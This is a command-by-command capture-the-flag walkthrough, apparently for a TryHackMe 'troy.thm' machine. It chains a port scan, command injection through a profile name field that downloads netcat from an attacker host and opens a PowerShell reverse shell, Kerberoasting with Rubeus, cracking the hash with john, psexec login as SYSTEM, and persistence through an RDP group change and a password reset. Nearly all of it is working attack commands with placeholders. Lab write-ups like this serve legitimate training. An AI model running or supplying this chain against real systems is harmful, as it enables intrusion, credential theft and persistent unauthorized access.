# basic port scan
sudo nmap -Pn -sV -sC -T5 <target-ip>
Port 80 is interesting. Create an account and navigate to profile. Open dev tools and block script.js URL. Reload page.
Use change name field for remote command execution.
# reverse shell listener (on attack machine)
nc -lvnp 9001
# upload nc executable (name field)
cheese | powershell curl <attack-ip>:8000/nc.exe -o nc.exe
# engage reverse shell (name field)
cheese | nc.exe <attack-ip> 9001 -e powershell
Windows shell foothold established.
# upload Ghostpack-CompiledBinaris/Rubeus.exe
curl <attack-ip>:<port>/Rubeus.exe -o Rubeus.exe
# dump kerberoast user hash
.\Rubeus.exe kerberoast /nowrap
# crack hash
john --wordlist=/usr/share/wordlists/rockyou.txt --format=krb5tgs hash
# deploy impacket
python3 psexec.py troy.thm/achilles:winniethepooh@<target-ip>
Successfully elevated to NT AUTHORITY\SYSTEM.
# become king
cd C:\
echo <name> > king.txt
# find flags
dir flag*.txt /s
type Users\<user>\Desktop\flag.txt
# setup rdp and access machine
net localgroup "Remote Desktop Users" achilles /add
net user achilles <newpassword>
xfreerdp /u:achilles /p:newpassword /v:<target-IP> /size:90%